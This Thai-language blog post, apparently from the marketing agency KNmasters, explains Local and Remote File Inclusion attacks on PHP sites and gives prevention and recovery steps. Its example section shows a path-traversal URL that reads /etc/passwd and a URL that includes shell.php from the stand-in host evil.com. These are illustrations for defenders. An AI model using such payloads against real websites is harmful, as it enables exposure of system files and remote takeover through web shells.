File Inclusion Attack คืออะไร? การแทรกไฟล์อันตรายผ่าน URL

หนึ่งในช่องโหว่ที่อันตรายและเกิดขึ้นบ่อยกับเว็บไซต์และเว็บแอปพลิเคชัน คือ File Inclusion Attack หรือการแทรกไฟล์อันตรายเข้าสู่ระบบผ่าน URL ซึ่งแบ่งออกเป็น 2 ประเภทหลัก ได้แก่ Remote File Inclusion (RFI) และ Local File Inclusion (LFI)

การโจมตีรูปแบบนี้เปิดโอกาสให้แฮกเกอร์สามารถเรียกใช้ไฟล์อันตรายจากภายนอกหรือแอบเข้าถึงไฟล์สำคัญในเครื่องเซิร์ฟเวอร์ ได้โดยตรง ส่งผลให้เว็บไซต์อาจถูกควบคุมจากระยะไกล ข้อมูลรั่วไหล หรือถูกฝังมัลแวร์โดยไม่รู้ตัว บทความนี้จะพาไปทำความรู้จักกับ File Inclusion Attack ว่าคืออะไร? อันตรายแค่ไหน? และวิธีป้องกันอย่างไรบ้าง?

File Inclusion Attack คืออะไร?

File Inclusion Attack คือช่องโหว่ที่เกิดจากการที่เว็บแอปพลิเคชันอนุญาตให้ผู้ใช้งานสามารถกำหนดพาธของไฟล์ที่จะโหลดหรือเรียกใช้ได้เองผ่าน URL หากไม่มีการตรวจสอบหรือกรองข้อมูลให้ดีพอ แฮกเกอร์สามารถใช้จุดนี้แทรกไฟล์อันตรายเข้ามาในระบบได้

แบ่งออกเป็น 2 ประเภทหลัก ดังนี้

1. Local File Inclusion (LFI)

• แฮกเกอร์แทรกพาธไฟล์ภายในเซิร์ฟเวอร์
• เข้าถึงไฟล์สำคัญ เช่น /etc/passwd (Linux) หรือไฟล์ Config ของระบบ
• อาจนำไปสู่การอ่านไฟล์ระบบหรือรันโค้ดอันตรายได้

2. Remote File Inclusion (RFI)

• แฮกเกอร์แทรกลิงก์ไฟล์จากภายนอก
• ดึงไฟล์ PHP, Shell Script หรือโค้ดอันตรายจาก Server ของแฮกเกอร์เข้ามารันในระบบเป้าหมาย
• ทำให้แฮกเกอร์สามารถควบคุมระบบจากระยะไกลได้ทันที

ตัวอย่างการโจมตี File Inclusion ผ่าน URL

http://example.com/index.php?page=../../../etc/passwd    // ตัวอย่าง LFI
http://example.com/index.php?page=http://evil.com/shell.php   // ตัวอย่าง RFI

http://example.com/index.php?page=../../../etc/passwd    // ตัวอย่าง LFI
http://example.com/index.php?page=http://evil.com/shell.php   // ตัวอย่าง RFI

ผลลัพธ์

แฮกเกอร์สามารถอ่านไฟล์สำคัญ, ฝัง Backdoor, หรือควบคุมเซิร์ฟเวอร์ได้

ผลกระทบของ File Inclusion Attack

• ข้อมูลสำคัญรั่วไหล เช่น Database Config, Password
• เว็บไซต์ถูกแฮกหรือฝัง Backdoor ทำให้แฮกเกอร์ควบคุมระบบได้
• ฝังมัลแวร์หรือสคริปต์อันตราย ส่งผลต่อผู้ใช้งานเว็บไซต์
• อันดับ SEO ตกทันทีเพราะ Google มองว่าเว็บไซต์มีมัลแวร์
• ภาพลักษณ์องค์กรเสียหายและเสี่ยงต่อการถูกฟ้องร้อง

สาเหตุที่เว็บไซต์เสี่ยงต่อ File Inclusion Attack

• ใช้ PHP หรือระบบที่โหลดไฟล์จากพารามิเตอร์ URL โดยไม่มีการตรวจสอบ
• รับค่า Input โดยตรงจากผู้ใช้งานโดยไม่ Validate
• ใช้ฟังก์ชัน PHP เช่น include(), require(), include_once(), require_once() โดยไม่มีการกรองค่า
• อัปเดตระบบไม่สม่ำเสมอทำให้มีช่องโหว่

วิธีป้องกัน File Inclusion Attack (RFI / LFI)

1. หลีกเลี่ยงการโหลดไฟล์จาก Input ของผู้ใช้โดยตรง
2. ตรวจสอบและ Validate ค่า Input ทุกครั้ง
   • จำกัดให้เลือกเฉพาะไฟล์ที่กำหนดไว้เท่านั้น
   • ใช้ Whitelist
3. ปิดการใช้งาน allow_url_include และ allow_url_fopen ใน php.ini
4. ตั้ง Directory Permissions ให้เหมาะสม ป้องกันการเข้าถึงไฟล์สำคัญ
5. อัปเดต PHP และระบบ CMS ให้เป็นเวอร์ชันล่าสุดเสมอ
6. ติดตั้ง Web Application Firewall (WAF) เพื่อช่วยป้องกันการโจมตี
7. สำรองข้อมูลเว็บไซต์อย่างสม่ำเสมอเพื่อกู้คืนได้ทันทีหากเกิดเหตุ

แนวทางแก้ไขเมื่อถูกโจมตีด้วย File Inclusion Attack

• เปลี่ยนรหัสผ่านทุกระบบทันที
• ตรวจสอบไฟล์ระบบและโค้ด PHP ทั้งหมดเพื่อหาสคริปต์อันตรายหรือ Backdoor
• สแกนเซิร์ฟเวอร์ด้วยเครื่องมือความปลอดภัย เช่น Wordfence, Sucuri
• ลบโค้ดหรือไฟล์ที่แฮกเกอร์แทรกเข้ามา
• Restore จาก Backup ที่ปลอดภัย
• ปิดช่องโหว่และอัปเดตระบบทันทีเพื่อไม่ให้เกิดซ้ำ

สรุป

File Inclusion Attack (RFI / LFI) เป็นหนึ่งในการโจมตีที่อันตรายและพบได้บ่อย โดยเฉพาะเว็บไซต์ที่พัฒนาโดย PHP และรับค่า Input ผ่าน URL หากไม่มีการกรองหรือตรวจสอบข้อมูลให้ดี อาจเปิดโอกาสให้แฮกเกอร์แทรกไฟล์อันตรายเข้ามาในระบบได้ง่ายๆ

การป้องกันต้องเริ่มตั้งแต่การออกแบบโครงสร้างเว็บไซต์ให้ปลอดภัยไปจนถึงการตั้งค่าระบบและตรวจสอบ Input ทุกครั้ง เพื่อให้เว็บไซต์ปลอดภัยจากการโจมตีและป้องกันความเสียหายที่อาจเกิดขึ้นในอนาคต

อย่ารอช้า! ให้ KNmasters ดูแลธุรกิจของคุณวันนี้!

หากคุณต้องการข้อมูลเพิ่มเติมหรืออยากเริ่มใช้บริการกับ KNmasters เราพร้อมช่วยให้ธุรกิจของคุณเติบโตด้วยกลยุทธ์การตลาดออนไลน์ครบวงจร

• Facebook: KNmasters
• LINE: KNmasters
• Youtube: KNmasters
• Instagram: knmasters.official
• Tiktok: KNmasters.official
• Twitter: KNmasters Official
• Fastwork: KNmasters
• เว็บไซต์: www.knmasters.com
• แผนที่: KNmasters